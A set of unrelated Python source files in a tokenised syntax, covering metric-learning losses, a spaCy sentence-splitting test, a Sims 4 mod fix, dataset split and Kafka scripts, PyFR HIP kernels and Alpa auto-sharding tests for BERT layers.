<class_stmt>ProxyNCALoss(torch.nn.Module)<block_start><def_stmt>__init__ self num_proxies embedding_dim<block_start>"""
Basic ProxyNCA Loss as proposed in 'No Fuss Distance Metric Learning using Proxies'.
Args:
num_proxies: int, number of proxies to use to estimate data groups. Usually set to number of classes.
embedding_dim: int, Required to generate initial proxies which are the same size as the actual data embeddings.
Returns:
Nothing!
"""<line_sep>super(ProxyNCALoss self).__init__()<line_sep>self.num_proxies=num_proxies<line_sep>self.embedding_dim=embedding_dim<line_sep>self.PROXIES=torch.nn.Parameter(torch.randn(num_proxies self.embedding_dim)/8)<line_sep>self.all_classes=torch.arange(num_proxies)<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
proxynca loss (torch.Tensor(), batch-averaged)
"""<line_sep>#Normalize batch in case it is not normalized (which should never be the case for ProxyNCA, but still).
#Same for the PROXIES. Note that the multiplication by 3 seems arbitrary, but helps the actual training.
batch=3<times>torch.nn.functional.normalize(batch dim=1)<line_sep>PROXIES=3<times>torch.nn.functional.normalize(self.PROXIES dim=1)<line_sep>#Group required proxies
pos_proxies=torch.stack([PROXIES[pos_label:pos_label+1 :]<for>pos_label labels])<line_sep>neg_proxies=torch.stack([torch.cat([self.all_classes[:class_label] self.all_classes[class_label+1:]])<for>class_label labels])<line_sep>neg_proxies=torch.stack([PROXIES[neg_labels :]<for>neg_labels neg_proxies])<line_sep>#Compute Proxy-distances
dist_to_neg_proxies=torch.sum((batch[: <none> :]-neg_proxies).pow(2) dim=-1)<line_sep>dist_to_pos_proxies=torch.sum((batch[: <none> :]-pos_proxies).pow(2) dim=-1)<line_sep>#Compute final proxy-based NCA loss
negative_log_proxy_nca_loss=torch.mean(dist_to_pos_proxies[: 0]+torch.logsumexp(-dist_to_neg_proxies dim=1))<line_sep><return>negative_log_proxy_nca_loss<block_end><block_end>"""================================================================================================="""<class_stmt>CEClassLoss(torch.nn.Module)<block_start><def_stmt>__init__ self inp_dim n_classes<block_start>"""
Basic Cross Entropy Loss for reference. Can be useful.
Contains its own mapping network, so the actual network can remain untouched.
Args:
inp_dim: int, embedding dimension of network.
n_classes: int, number of target classes.
Returns:
Nothing!
"""<line_sep>super(CEClassLoss self).__init__()<line_sep>self.mapper=torch.nn.Sequential(torch.nn.Linear(inp_dim n_classes))<line_sep>self.ce_loss=torch.nn.CrossEntropyLoss()<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
cross-entropy loss (torch.Tensor(), batch-averaged by default)
"""<line_sep><return>self.ce_loss(self.mapper(batch) labels.type(torch.cuda.LongTensor))<block_end><block_end> |
<import_from_stmt>spikex.defaults spacy_version<import_from_stmt>spikex.pipes SentX<line_sep>SENTS=["This is a bullet list that we want to be a unique sentence:\n"<concat>"\ta) the first bullet;\n"<concat>"\tb) the second bullet;\n"<concat>"\tc) a bullet with nested bullets:\n"<concat>"\t\t1) first nested bullet;"<concat>"\t\t2) second nested bullet."<concat>"\td) last bullet.\n" "Paragraph title " "The title was misformatted with the text. " "Now we try to split on abbreviations like Figs. 1 or Fig. 2. " "They can create confusion, like No.42 or eg. Num. 42 or U.S.; " "these are some cases, but there could it be more out there." ]<def_stmt>test_splitta nlp<block_start>sentx_pipe=SentX()<if>spacy_version<l>3<else>"sentx"<line_sep>nlp.add_pipe(sentx_pipe before="parser")<line_sep>doc=nlp("".join(SENTS))<assert_stmt>len([s<for>s doc.sents])<eq>len(SENTS)<block_end> |
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""<line_sep># The purpose of this file is to fix the fact that when trying to access the "full_name" attribute on Sims an empty string is returned.
# noinspection PyBroadException
<import_from_stmt>sims.sim_info SimInfo<import_from_stmt>sims4communitylib.modinfo ModInfo<import_from_stmt>sims4communitylib.utils.common_injection_utils CommonInjectionUtils<import_from_stmt>sims4communitylib.utils.sims.common_sim_name_utils CommonSimNameUtils<import_from_stmt>sims4communitylib.utils.sims.common_sim_utils CommonSimUtils<line_sep>@CommonInjectionUtils.inject_safely_into(ModInfo.get_identity() SimInfo 'full_name')<def_stmt>_common_fix_full_name_returning_empty_string original self:SimInfo *_ **__<block_start>original_value=original(self *_ **__)<if_stmt>original_value<eq>''<block_start><return>CommonSimNameUtils.get_full_name(CommonSimUtils.get_sim_info(self))<block_end><return>original_value<block_end> |
"""
Convenience classes for experiments, including monitoring and stop criteria.
"""<line_sep> |
"""
This code conduct:
1. exclude a subset of data related to a certain illumination condition from an existing training set
2. keep a subset of data related to the same illumination condition from an existing test set
ATTENTION: this code require to run prepare_data_split.py first
Author: <NAME> (<EMAIL>)
Date: March, 2020
"""<import_stmt>os<import_stmt>os.path<as>ops<if_stmt>__name__<eq>'__main__'<block_start>batch_size=8# use to ignore the last for convenience
# exclude subsets from train
name_pattens_to_exclude=['/00/' '/01/' '/06/' '/07/']<line_sep>output_folder='../data_splits/illus_chg/'<if_stmt><not>ops.exists(output_folder)<block_start>os.makedirs(output_folder)<block_end>lines_train=[]<line_sep>json_file_path="../data_splits/standard/train.json"<assert_stmt>ops.exists(json_file_path) '{:s} not exist'.format(json_file_path)<with_stmt>open(json_file_path)<as>f<block_start>lines_i=f.readlines()<block_end>f.close()<for_stmt>line lines_i<block_start>to_discard=<false><for_stmt>name_patten name_pattens_to_exclude<block_start><if_stmt>name_patten<in>line<block_start>to_discard=<true><line_sep><break><block_end><block_end><if_stmt><not>to_discard<block_start>lines_train.append(line)<block_end><block_end>lines_train=lines_train[:len(lines_train)<floordiv>batch_size<times>batch_size]<with_stmt>open(output_folder+'/train.json' 'w')<as>f<block_start>f.writelines("%s"%l<for>l lines_train)<block_end>f.close()<line_sep>#########################################################################################
# include subsets in test
name_pattens_to_include=['/00/' '/01/' '/06/' '/07/']<line_sep>lines_test=[]<line_sep>json_file_path="../data_splits/standard/test.json"<assert_stmt>ops.exists(json_file_path) '{:s} not exist'.format(json_file_path)<with_stmt>open(json_file_path)<as>f<block_start>lines_i=f.readlines()<block_end>f.close()<for_stmt>line lines_i<block_start>to_discard=<false><for_stmt>name_patten name_pattens_to_include<block_start><if_stmt>name_patten<in>line<block_start>lines_test.append(line)<block_end><block_end><block_end>lines_test=lines_test[:len(lines_test)<floordiv>batch_size<times>batch_size]<with_stmt>open(output_folder+'/test.json' 'w')<as>f<block_start>f.writelines("%s"%l<for>l lines_test)<block_end>f.close()<block_end> |
<import_from_stmt>kafka KafkaProducer<line_sep>producer=KafkaProducer(bootstrap_servers="127.0.0.1:9092")<for_stmt>_ range(10000)<block_start>producer.send("my_topic" b"message")<line_sep># producer.flush()
<block_end> |
# -*- coding: utf-8 -*-
<import_from_stmt>pyfr.backends.base NullKernel<import_from_stmt>pyfr.backends.hip.provider HIPKernel HIPKernelProvider get_grid_for_block <class_stmt>HIPPackingKernels(HIPKernelProvider)<block_start><def_stmt>pack self mv<block_start>hip=self.backend.hip<line_sep># An exchange view is simply a regular view plus an exchange matrix
m,v=mv.xchgmat mv.view<line_sep># Compute the grid and thread-block size
block=(128 1 1)<line_sep>grid=get_grid_for_block(block v.n)<line_sep># Render the kernel template
src=self.backend.lookup.get_template('pack').render(blocksz=block[0])<line_sep># Build
kern=self._build_kernel('pack_view' src 'iiiPPPP')<line_sep># Set the arguments
params=kern.make_params(grid block)<line_sep>params.set_args(v.n v.nvrow v.nvcol v.basedata v.mapping v.rstrides<or>0 m)<line_sep># If MPI is HIP aware then we just need to pack the buffer
<if_stmt>self.backend.mpitype<eq>'hip-aware'<block_start><class_stmt>PackXchgViewKernel(HIPKernel)<block_start><def_stmt>add_to_graph self graph deps<block_start><pass><block_end><def_stmt>run self stream<block_start>kern.exec_async(stream params)<block_end><block_end><block_end># Otherwise, we need to both pack the buffer and copy it back
<else_stmt><block_start><class_stmt>PackXchgViewKernel(HIPKernel)<block_start><def_stmt>add_to_graph self graph deps<block_start><pass><block_end><def_stmt>run self stream<block_start>kern.exec_async(stream params)<line_sep>hip.memcpy(m.hdata m.data m.nbytes stream)<block_end><block_end><block_end><return>PackXchgViewKernel(mats=[mv])<block_end><def_stmt>unpack self mv<block_start>hip=self.backend.hip<if_stmt>self.backend.mpitype<eq>'hip-aware'<block_start><return>NullKernel()<block_end><else_stmt><block_start><class_stmt>UnpackXchgMatrixKernel(HIPKernel)<block_start><def_stmt>add_to_graph self graph deps<block_start><pass><block_end><def_stmt>run self stream<block_start>hip.memcpy(mv.data mv.hdata mv.nbytes stream)<block_end><block_end><return>UnpackXchgMatrixKernel(mats=[mv])<block_end><block_end><block_end> |
"""Test auto sharding on transformer layers and bert models."""<import_stmt>unittest<import_stmt>jax<import_stmt>jax.numpy<as>jnp<import_stmt>numpy<as>np<import_from_stmt>flax optim linen<as>nn<import_from_stmt>alpa parallelize ShardParallel LocalPhysicalDeviceMesh AutoShardingOption<import_from_stmt>alpa.model.bert_model BertConfig FlaxBertLayerCollection FlaxBertForMaskedLMModule <import_from_stmt>alpa.util count_communication_primitives<import_from_stmt>test_auto_sharding_mlp assert_all_replicated assert_close assert_column_partitioned assert_data_parallel_cost assert_fully_sharded assert_less_equal assert_sharded assert_replicated_column_partitioned assert_replicated_row_partitioned assert_row_partitioned is_fully_sharded assert_sharding_zero_stage_3 <class_stmt>AutoShardingAttentionTest(unittest.TestCase)<block_start><def_stmt>setUp self<block_start><assert_stmt>len(jax.local_devices())<ge>4<line_sep>self.physical_mesh=LocalPhysicalDeviceMesh(jax.local_devices()[:4])<line_sep>self.as_option=AutoShardingOption()<block_end><def_stmt>get_device_mesh self shape mesh_alpha mesh_beta<block_start><return>self.physical_mesh.get_logical_mesh(shape mesh_alpha mesh_beta)<block_end><def_stmt>run_bert_layers self batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh<block_start>@parallelize(method=ShardParallel(devices=device_mesh auto_sharding_option=self.as_option))<def_stmt>train_step optimizer batch deterministic apply_fn<block_start><def_stmt>loss_func params<block_start>rngs={"dropout":batch["rng"]}<line_sep>out=apply_fn(params batch["hidden_states"] batch["attention_mask"] deterministic rngs=rngs)[0]<line_sep><return>jnp.mean((out-batch["label"])<power>2)<block_end>grad=jax.grad(loss_func)(optimizer.target)<line_sep>new_optimizer=optimizer.apply_gradient(grad)<line_sep><return>new_optimizer<block_end># Init model and optimizer
hidden_states=jnp.ones((batch_size seq_len hidden_size) dtype=jnp.float32)<line_sep>attention_mask=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>label=jnp.ones((batch_size seq_len hidden_size) dtype=jnp.float32)<line_sep>model=FlaxBertLayerCollection(BertConfig(num_hidden_layers=num_layers hidden_size=hidden_size intermediate_size=hidden_size<times>4 num_attention_heads=num_heads gradient_checkpointing=use_remat))<line_sep>rngkey=jax.random.PRNGKey(0)<line_sep>params=model.init(rngkey hidden_states attention_mask)<line_sep>optimizer=optim.Adam(1e-2).create(params)<line_sep># JIT compile
optimizer=train_step(optimizer {"hidden_states":hidden_states "attention_mask":attention_mask "label":label "rng":rngkey} deterministic model.apply)<line_sep># Get optimized HLO IR
executable=train_step.get_executable(optimizer {"hidden_states":hidden_states "attention_mask":attention_mask "label":label "rng":rngkey} deterministic model.apply)<line_sep><return>(optimizer executable.get_hlo_text() executable.auto_sharding_objective)<block_end><def_stmt>run_bert_mlm self batch_size seq_len num_layers hidden_size num_heads vocab_size deterministic device_mesh<block_start>@parallelize(method=ShardParallel(devices=device_mesh auto_sharding_option=self.as_option))<def_stmt>train_step optimizer batch<block_start><def_stmt>loss_func params<block_start>rngs={"dropout":batch["rng"]}<line_sep>logits=model.apply(params batch["input_ids"] batch["attention_mask"] batch["token_type_ids"] batch["position_ids"] deterministic=deterministic rngs=rngs)[0]<line_sep>label_mask=jnp.where(batch["labels"]<g>0 1.0 0.0)<line_sep>labels=jax.nn.one_hot(batch["labels"] logits.shape[-1])<line_sep>loss=-jnp.sum(labels<times>jax.nn.log_softmax(logits axis=-1) axis=-1)<line_sep><return>(label_mask<times>loss).sum()/label_mask.sum()<times>0.1234<block_end>grad=jax.grad(loss_func)(optimizer.target)<line_sep>new_optimizer=optimizer.apply_gradient(grad)<line_sep><return>new_optimizer<block_end># Init model and optimizer
input_ids=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>attention_mask=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>token_type_ids=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>position_ids=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>labels=jnp.ones((batch_size seq_len) dtype=jnp.int32)<line_sep>model=FlaxBertForMaskedLMModule(BertConfig(num_hidden_layers=num_layers hidden_size=hidden_size intermediate_size=hidden_size<times>4 num_attention_heads=num_heads vocab_size=vocab_size max_position_embeddings=seq_len ))<line_sep>rngkey=jax.random.PRNGKey(0)<line_sep>params=model.init(rngkey input_ids attention_mask token_type_ids position_ids)<line_sep>optimizer=optim.Adam(1e-2).create(params)<line_sep># JIT compile
optimizer=train_step(optimizer {"input_ids":input_ids "attention_mask":attention_mask "token_type_ids":token_type_ids "position_ids":position_ids "labels":labels "rng":rngkey})<line_sep># Get optimized HLO IR
executable=train_step.get_executable(optimizer {"input_ids":input_ids "attention_mask":attention_mask "token_type_ids":token_type_ids "position_ids":position_ids "labels":labels "rng":rngkey})<line_sep><return>(optimizer executable.get_hlo_text() executable.auto_sharding_objective)<block_end><def_stmt>test_bert_layer_data_parallel self<block_start>batch_size=64<line_sep>seq_len=64<line_sep>num_layers=2<line_sep>hidden_size=32<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<false><line_sep># Test on different logical mesh shapes
<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>assert_data_parallel_cost(optimizer hlo_ir objective device_mesh self.as_option i)<block_end><block_end><def_stmt>test_bert_layer_model_parallel self<block_start>batch_size=8<line_sep>seq_len=8<line_sep>num_layers=2<line_sep>hidden_size=128<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<false><line_sep># Test on different logical mesh shapes
<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep># Check communication cost
expected=(num_layers<times>4-1)<times>device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 i)<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir))<if_stmt>self.as_option.prefer_reduce_scatter<block_start><assert_stmt>n_total<eq>num_layers<times>4-1<assert_stmt>n_all_reduce<eq>num_layers<times>4-1<assert_stmt>n_total<eq>n_all_reduce<block_end><else_stmt><block_start><assert_stmt>n_total<eq>num_layers<times>4-1<assert_stmt>n_all_reduce<eq>num_layers<times>4-1<assert_stmt>n_total<eq>n_all_reduce<block_end># Check sharding specification
<for_stmt>k range(num_layers)<block_start>params=optimizer.target["params"][str(k)]<line_sep>weights=[params["attention"]["self"]["qvk_combined"]["kernel"] params["attention"]["output"]["dense"]["kernel"] params["intermediate"]["dense"]["kernel"] params["output"]["dense"]["kernel"] ]<for_stmt>j range(len(weights))<block_start><if_stmt>j%2<eq>0<block_start>assert_column_partitioned(weights[j] mesh_shape[i] i)<block_end><else_stmt><block_start>assert_row_partitioned(weights[j] mesh_shape[i] i)<block_end><block_end><block_end><block_end><block_end><def_stmt>test_bert_layer_2d_mesh self<block_start>batch_size=8<line_sep>seq_len=8<line_sep>num_layers=2<line_sep>hidden_size=128<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<false><line_sep># Test on different logical mesh shapes
mesh_shape=[2 2]<line_sep>device_mesh=self.get_device_mesh(mesh_shape [2 2] [1 0.1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep># Check communication cost
params=jax.tree_util.tree_leaves(optimizer.target)<line_sep>expected=(sum(device_mesh.all_reduce_cost(np.prod(x.shape)<times>4/mesh_shape[1] 0)<for>x params)+device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4/mesh_shape[0] 1)<times>(num_layers<times>4-1))<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir ignore_scalar_all_reduce=<true>))<if_stmt>self.as_option.prefer_reduce_scatter<block_start><assert_stmt>n_all_reduce<eq>num_layers<times>4-1<assert_stmt>n_reduce_scatter<eq>2<assert_stmt>n_all_gather<eq>1<assert_stmt>n_total<eq>n_all_reduce+n_reduce_scatter+n_all_gather<block_end><else_stmt><block_start><assert_stmt>n_all_reduce<eq>num_layers<times>4<assert_stmt>n_total<eq>n_all_reduce<block_end># Check sharding specification
<if_stmt>self.as_option.prefer_reduce_scatter<block_start><for_stmt>weight jax.tree_util.tree_leaves(optimizer.state.param_states)<block_start><if_stmt>len(weight.shape)<g>1<block_start>assert_fully_sharded(weight)<block_end><block_end><block_end><else_stmt><block_start><for_stmt>k range(num_layers)<block_start>params=optimizer.target["params"][str(k)]<line_sep>weights=[params["attention"]["self"]["qvk_combined"]["kernel"] params["attention"]["output"]["dense"]["kernel"] params["intermediate"]["dense"]["kernel"] params["output"]["dense"]["kernel"] ]<for_stmt>j range(len(weights))<block_start><if_stmt>j%2<eq>0<block_start>assert_replicated_column_partitioned(weights[j] mesh_shape)<block_end><else_stmt><block_start>assert_replicated_row_partitioned(weights[j] mesh_shape)<block_end><block_end><block_end><block_end><block_end><def_stmt>test_bert_layer_force_batch_dim_mapping self<block_start>batch_size=64<line_sep>seq_len=64<line_sep>num_layers=2<line_sep>hidden_size=32<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<false><line_sep>self.as_option.force_batch_dim_to_mesh_dim=0<line_sep># data parallel
device_mesh=self.get_device_mesh([4 1] [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>assert_data_parallel_cost(optimizer hlo_ir objective device_mesh self.as_option 0)<line_sep># model parallel (case 1)
device_mesh=self.get_device_mesh([1 4] [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>expected=(num_layers<times>4-1)<times>device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 1)<line_sep>assert_close(objective expected)<line_sep># model parallel (case 2)
batch_size=1<line_sep>device_mesh=self.get_device_mesh([1 4] [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>expected=(num_layers<times>4-1)<times>device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 1)<line_sep>assert_close(objective expected)<block_end><def_stmt>test_embedding_2d_mesh self<block_start>vocab_size=1024<line_sep>hidden_size=8<line_sep>batch_size=8<line_sep>seq_len=8<line_sep>mesh_shape=[2 2]<line_sep># Model and training step definition
<class_stmt>Model(nn.Module)<block_start>"""Tied input and output embedding."""<def_stmt>setup self<block_start>self.embed=nn.Embed(vocab_size hidden_size)<block_end><def_stmt>__call__ self x<block_start>x=self.embed(x)<line_sep>embed=self.embed.variables["params"]["embedding"]<line_sep>x=x@embed.T<line_sep><return>x<block_end><block_end>logical_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>@parallelize(method=ShardParallel(devices=logical_mesh))<def_stmt>func optimizer x y<block_start><def_stmt>loss_func params<block_start>out=model.apply(params x)<line_sep>y_=jax.nn.one_hot(y out.shape[-1])<line_sep>loss=-jnp.sum(y_<times>jax.nn.log_softmax(out axis=-1) axis=-1)<line_sep><return>loss.sum()<block_end>grad=jax.grad(loss_func)(optimizer.target)<line_sep>new_optimizer=optimizer.apply_gradient(grad)<line_sep><return>new_optimizer<block_end># Init model and optimizer
x=jnp.ones((batch_size seq_len) np.int32)<line_sep>y=jnp.ones((batch_size seq_len) np.int32)<line_sep>model=Model()<line_sep>rngkey=jax.random.PRNGKey(0)<line_sep>params=model.init(rngkey x)<line_sep>optimizer=optim.Adam(1e-2).create(params)<line_sep># JIT Compile
optimize=func(optimizer x y)<line_sep># Check communication cost
executable=func.get_executable(optimizer x y)<line_sep>hlo_ir=executable.get_hlo_text()<line_sep>objective=executable.auto_sharding_objective<line_sep>params=jax.tree_util.tree_leaves(optimizer.target)<line_sep>expected=(logical_mesh.all_reduce_cost(vocab_size<times>hidden_size<times>4/mesh_shape[1] 0)+logical_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4/mesh_shape[0] 1)<times>2+logical_mesh.all_reduce_cost(batch_size<times>seq_len<times>4/mesh_shape[0] 1)<times>2)<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir))<assert_stmt>n_total<eq>n_all_reduce<block_end><def_stmt>test_bert_mlm_data_parallel self<block_start>batch_size=32<line_sep>seq_len=32<line_sep>num_layers=2<line_sep>hidden_size=16<line_sep>num_heads=4<line_sep>vocab_size=128<line_sep>deterministic=<false><line_sep># Test on different logical mesh shapes
<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_mlm(batch_size seq_len num_layers hidden_size num_heads vocab_size deterministic device_mesh)<if_stmt>self.as_option.force_zero_stage_3# only the weight and opt_state of token_embed is not sharded
<block_start>assert_sharding_zero_stage_3(optimizer 3)<line_sep><continue><block_end>assert_data_parallel_cost(optimizer hlo_ir objective device_mesh self.as_option i 1)<block_end><block_end>@unittest.skip("This test is broken after we disallow some replicated iota.")<def_stmt>test_bert_mlm_model_parallel self<block_start>batch_size=16<line_sep>seq_len=16<line_sep>num_layers=2<line_sep>hidden_size=128<line_sep>num_heads=4<line_sep>vocab_size=512<line_sep>deterministic=<false><line_sep>self.as_option.allow_all_gather=<false># Temporary hack
self.as_option.allow_all_to_all=<false># Temporary hack
# Test on different logical mesh shapes
<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_mlm(batch_size seq_len num_layers hidden_size num_heads vocab_size deterministic device_mesh)<line_sep># Check communication cost
# expected_cost = embed.forward (1) + embed.backward(2) +
# LM_head.forward (1) + LM_head.backward (1) +
# LM_head.weight.backward (1) + log_softmax.forward (2) +
# transformer.forward (2 * num_layers) + transformer.backward (2 * num_layers)
#
# Note that the final cost is different from this estimated cost in ILP solver.
# The SPMD partitioner will eliminate some unnecessary communication in favor of
# redundant computation (e.g., it will elimiate the all-reduce in embed.backward).
expected=(device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 i)<times>5+device_mesh.all_reduce_cost(hidden_size<times>hidden_size<times>4 i)+device_mesh.all_reduce_cost(batch_size<times>seq_len<times>4 i)<times>2+device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 i)<times>num_layers<times>4)<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir))<line_sep># real number of all-reduce = transformers (4 * num_layers) + log_softmax (2) +
# embed.forward (1) + embad.backward (1)
<assert_stmt>n_all_reduce<eq>num_layers<times>4+4<assert_stmt>n_total<eq>n_all_reduce<line_sep># Check sharding specification
embed_weight=optimizer.target["params"]["bert"]["embeddings"]["word_embeddings"]["embedding"]<line_sep>lm_head=optimizer.target["params"]["cls"]["predictions"]["transform"]["dense"]["kernel"]<line_sep>assert_row_partitioned(embed_weight mesh_shape[i] i)<line_sep>assert_all_replicated(lm_head np.prod(mesh_shape))<for_stmt>k range(num_layers)<block_start>params=optimizer.target["params"]["bert"]["encoder"]["layer"][str(k)]<line_sep>weights=[params["attention"]["self"]["qvk_combined"]["kernel"] params["attention"]["output"]["dense"]["kernel"] params["intermediate"]["dense"]["kernel"] params["output"]["dense"]["kernel"] ]<for_stmt>j range(len(weights))<block_start><if_stmt>j%2<eq>0<block_start>assert_column_partitioned(weights[j] mesh_shape[i] i)<block_end><else_stmt><block_start>assert_row_partitioned(weights[j] mesh_shape[i] i)<block_end><block_end><block_end><block_end><block_end><def_stmt>test_bert_mlm_2d_mesh self<block_start>batch_size=4<line_sep>seq_len=4<line_sep>num_layers=2<line_sep>hidden_size=512<line_sep>num_heads=4<line_sep>vocab_size=4096<line_sep>deterministic=<false><line_sep># To generate the desired strategy, we have to turn off mixed mesh shape and all-gather
# and enable recomputing heavy ops.
self.as_option.allow_recompute_heavy_op=<true><line_sep>self.as_option.allow_all_gather=<false><line_sep>self.as_option.allow_mixed_mesh_shape=<false><line_sep>mesh_shape=[2 2]<line_sep>device_mesh=self.get_device_mesh(mesh_shape [2 2] [1 0.1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_mlm(batch_size seq_len num_layers hidden_size num_heads vocab_size deterministic device_mesh)<line_sep># Check communication cost.
n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir ignore_scalar_all_reduce=<true>))<if_stmt>self.as_option.prefer_reduce_scatter<block_start><assert_stmt>n_all_reduce<eq>4<times>num_layers+2+2<assert_stmt>n_reduce_scatter<le>3# The correct number should be 2,
# but GpuMultiOutputFusion can make
# some reduce-scatter unable to be combined
<assert_stmt>n_all_gather<eq>1<assert_stmt>n_total<eq>n_all_reduce+n_all_gather+n_reduce_scatter<block_end><else_stmt># real number of all-reduce = transformers (4 * num_layers) + log_softmax (2) +
# embed.forward (1) + embad.backward (1) + weights (1)
<block_start><assert_stmt>n_all_reduce<eq>4<times>num_layers+2+2+1<assert_stmt>n_total<eq>n_all_reduce<block_end># Check sharding specification
<assert_stmt>"s32[4,4,4096]{2,1,0} iota()"<not><in>hlo_ir<assert_stmt>"s32[2,4,2048]{2,1,0} iota()"<in>hlo_ir<if_stmt>self.as_option.prefer_reduce_scatter<block_start>num_not_sharded=0# allow the token_type_embeddings not partitioned.
<for_stmt>weight jax.tree_util.tree_leaves(optimizer.state.param_states)<block_start><if_stmt>len(weight.shape)<g>1<block_start><if_stmt><not>is_fully_sharded(weight)<block_start>num_not_sharded<augadd>1<block_end><block_end><block_end><assert_stmt>num_not_sharded<le>2<block_end><else_stmt><block_start>embed_weight=(optimizer.target["params"]["bert"]["embeddings"]["word_embeddings"]["embedding"])<line_sep>lm_head=(optimizer.target["params"]["cls"]["predictions"]["transform"]["dense"]["kernel"])<line_sep>assert_replicated_row_partitioned(embed_weight mesh_shape)<line_sep>assert_all_replicated(lm_head np.prod(mesh_shape))<for_stmt>k range(num_layers)<block_start>params=optimizer.target["params"]["bert"]["encoder"]["layer"][str(k)]<line_sep>weights=[params["attention"]["self"]["qvk_combined"]["kernel"] params["attention"]["output"]["dense"]["kernel"] params["intermediate"]["dense"]["kernel"] params["output"]["dense"]["kernel"] ]<for_stmt>j range(len(weights))<block_start><if_stmt>j%2<eq>0<block_start>assert_replicated_column_partitioned(weights[j] mesh_shape)<block_end><else_stmt><block_start>assert_replicated_row_partitioned(weights[j] mesh_shape)<block_end><block_end><block_end><block_end><block_end><def_stmt>test_bert_layer_data_parallel_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_layer_data_parallel()<block_end><def_stmt>test_bert_layer_model_parallel_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_layer_model_parallel()<block_end><def_stmt>test_bert_layer_2d_mesh_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_layer_2d_mesh()<block_end><def_stmt>test_bert_mlm_data_parallel_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_mlm_data_parallel()<block_end><def_stmt>test_bert_mlm_data_parallel_reduce_scatter_zero_3 self<block_start>self.as_option.force_zero_stage_3=<true><line_sep>self.as_option.force_zero_stage_3_all_gather_threshold=1<line_sep>self.test_bert_mlm_data_parallel()<block_end>@unittest.skip("This test is broken after we disallow some replicated iota.")<def_stmt>test_bert_mlm_model_parallel_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_mlm_model_parallel()<block_end><def_stmt>test_bert_mlm_2d_mesh_reduce_scatter self<block_start>self.as_option.prefer_reduce_scatter=<true><line_sep>self.test_bert_mlm_2d_mesh()<block_end><def_stmt>test_bert_layer_model_parallel_remat self<block_start>batch_size=8<line_sep>seq_len=8<line_sep>num_layers=2<line_sep>hidden_size=128<line_sep>num_heads=8<line_sep>deterministic=<false><line_sep>use_remat=<true><line_sep># Test on different logical mesh shapes
